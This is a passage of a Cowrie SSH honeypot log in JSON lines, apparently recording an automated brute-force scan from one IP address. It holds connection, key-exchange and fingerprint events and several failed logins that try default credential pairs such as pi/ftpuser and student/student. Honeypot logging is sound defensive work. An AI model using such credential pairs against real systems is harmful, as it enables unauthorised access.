cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:36.776967Z","src_ip":"87.120.191.13","session":"af902a7b804e"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:36.785180Z","src_ip":"87.120.191.13","session":"fb31d84bf172"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:36.791218Z","src_ip":"87.120.191.13","session":"a4f174c5fe7a"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:36.795323Z","src_ip":"87.120.191.13","session":"fb31d84bf172"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:36.797067Z","src_ip":"87.120.191.13","session":"af2891926ffa"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35356,"dst_ip":"1.2.3.4","dst_port":22,"session":"35e591477b32","protocol":"ssh","message":"New connection: 87.120.191.13:35356 (1.2.3.4:22) [session: 35e591477b32]","sensor":"my-vps","timestamp":"2025-08-26T13:58:36.813679Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:36.815389Z","src_ip":"87.120.191.13","session":"35e591477b32"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35368,"dst_ip":"1.2.3.4","dst_port":22,"session":"104fce80bed8","protocol":"ssh","message":"New connection: 87.120.191.13:35368 (1.2.3.4:22) [session: 104fce80bed8]","sensor":"my-vps","timestamp":"2025-08-26T13:58:36.817087Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:36.841989Z","src_ip":"87.120.191.13","session":"104fce80bed8"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:36.842526Z","src_ip":"87.120.191.13","session":"104fce80bed8"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:36.844336Z","src_ip":"87.120.191.13","session":"35e591477b32"}
{"eventid":"cowrie.login.failed","username":"noc","password":"student","message":"login attempt [noc/student] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:36.852814Z","src_ip":"87.120.191.13","session":"af902a7b804e"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"student","message":"login attempt [ftpuser/student] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:36.878165Z","src_ip":"87.120.191.13","session":"499536f6a4cd"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"student","message":"login attempt [ubnt/student] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:36.903814Z","src_ip":"87.120.191.13","session":"fb31d84bf172"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"student","message":"login attempt [ftpuser/student] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:36.957858Z","src_ip":"87.120.191.13","session":"35e591477b32"}
{"eventid":"cowrie.login.failed","username":"pi","password":"student","message":"login attempt [pi/student] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:36.967520Z","src_ip":"87.120.191.13","session":"104fce80bed8"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:37.084779Z","src_ip":"87.120.191.13","session":"fbe31866f09f"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35382,"dst_ip":"1.2.3.4","dst_port":22,"session":"e66e8c8bc370","protocol":"ssh","message":"New connection: 87.120.191.13:35382 (1.2.3.4:22) [session: e66e8c8bc370]","sensor":"my-vps","timestamp":"2025-08-26T13:58:37.107563Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:37.114309Z","src_ip":"87.120.191.13","session":"e66e8c8bc370"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:37.159298Z","src_ip":"87.120.191.13","session":"e66e8c8bc370"}
{"eventid":"cowrie.login.failed","username":"student","password":"student","message":"login attempt [student/student] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:37.279202Z","src_ip":"87.120.191.13","session":"e66e8c8bc370"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:37.426778Z","src_ip":"87.120.191.13","session":"d9cd59a3c2f0"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35384,"dst_ip":"1.2.3.4","dst_port":22,"session":"c93b5e05367a","protocol":"ssh","message":"New connection: 87.120.191.13:35384 (1.2.3.4:22) [session: c93b5e05367a]","sensor":"my-vps","timestamp":"2025-08-26T13:58:37.447924Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:37.480493Z","src_ip":"87.120.191.13","session":"c93b5e05367a"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:37.481394Z","src_ip":"87.120.191.13","session":"c93b5e05367a"}
{"eventid":"cowrie.login.failed","username":"admin","password":"ftpuser","message":"login attempt [admin/ftpuser] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:37.742801Z","src_ip":"87.120.191.13","session":"c93b5e05367a"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:37.942225Z","src_ip":"87.120.191.13","session":"af902a7b804e"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:37.960769Z","src_ip":"87.120.191.13","session":"499536f6a4cd"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35394,"dst_ip":"1.2.3.4","dst_port":22,"session":"e6f034258693","protocol":"ssh","message":"New connection: 87.120.191.13:35394 (1.2.3.4:22) [session: e6f034258693]","sensor":"my-vps","timestamp":"2025-08-26T13:58:37.969836Z"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35404,"dst_ip":"1.2.3.4","dst_port":22,"session":"4247fa6ec270","protocol":"ssh","message":"New connection: 87.120.191.13:35404 (1.2.3.4:22) [session: 4247fa6ec270]","sensor":"my-vps","timestamp":"2025-08-26T13:58:37.983605Z"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:38.001384Z","src_ip":"87.120.191.13","session":"fb31d84bf172"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35416,"dst_ip":"1.2.3.4","dst_port":22,"session":"edf3999fefac","protocol":"ssh","message":"New connection: 87.120.191.13:35416 (1.2.3.4:22) [session: edf3999fefac]","sensor":"my-vps","timestamp":"2025-08-26T13:58:38.024631Z"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:38.026536Z","src_ip":"87.120.191.13","session":"35e591477b32"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:38.033998Z","src_ip":"87.120.191.13","session":"104fce80bed8"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:38.037181Z","src_ip":"87.120.191.13","session":"e6f034258693"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:38.037893Z","src_ip":"87.120.191.13","session":"e6f034258693"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:38.046822Z","src_ip":"87.120.191.13","session":"4247fa6ec270"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:38.047364Z","src_ip":"87.120.191.13","session":"4247fa6ec270"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35422,"dst_ip":"1.2.3.4","dst_port":22,"session":"57c65ac13355","protocol":"ssh","message":"New connection: 87.120.191.13:35422 (1.2.3.4:22) [session: 57c65ac13355]","sensor":"my-vps","timestamp":"2025-08-26T13:58:38.072060Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:38.077402Z","src_ip":"87.120.191.13","session":"edf3999fefac"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:38.078158Z","src_ip":"87.120.191.13","session":"edf3999fefac"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35430,"dst_ip":"1.2.3.4","dst_port":22,"session":"1cca0c376b0c","protocol":"ssh","message":"New connection: 87.120.191.13:35430 (1.2.3.4:22) [session: 1cca0c376b0c]","sensor":"my-vps","timestamp":"2025-08-26T13:58:38.080001Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:38.116608Z","src_ip":"87.120.191.13","session":"57c65ac13355"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:38.117277Z","src_ip":"87.120.191.13","session":"57c65ac13355"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:38.121116Z","src_ip":"87.120.191.13","session":"1cca0c376b0c"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:38.121755Z","src_ip":"87.120.191.13","session":"1cca0c376b0c"}
{"eventid":"cowrie.login.failed","username":"noc","password":"ftpuser","message":"login attempt [noc/ftpuser] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:38.347305Z","src_ip":"87.120.191.13","session":"e6f034258693"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:38.361382Z","src_ip":"87.120.191.13","session":"e66e8c8bc370"}
{"eventid":"cowrie.login.failed","username":"pi","password":"ftpuser","message":"login attempt [pi/ftpuser] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:38.376084Z","src_ip":"87.120.191.13","session":"1cca0c376b0c"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"ftpuser","message":"login attempt [ftpuser/ftpuser] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:38.378756Z","src_ip":"87.120.191.13","session":"4247fa6ec270"}
